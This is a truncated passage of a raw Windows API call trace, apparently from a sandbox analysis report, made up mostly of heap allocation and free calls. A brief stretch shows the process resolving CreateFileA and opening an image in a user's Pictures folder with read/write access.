hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.827] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.828] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda98 [0190.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.829] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0190.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.829] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0190.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0190.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg", lpUsedDefaultChar=0x0) returned 67 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.830] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\tim2ia.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x907778 [0190.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x907778, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.jpg") returned 67 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0190.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0190.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0190.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0190.833] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.834] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.835] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0190.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: 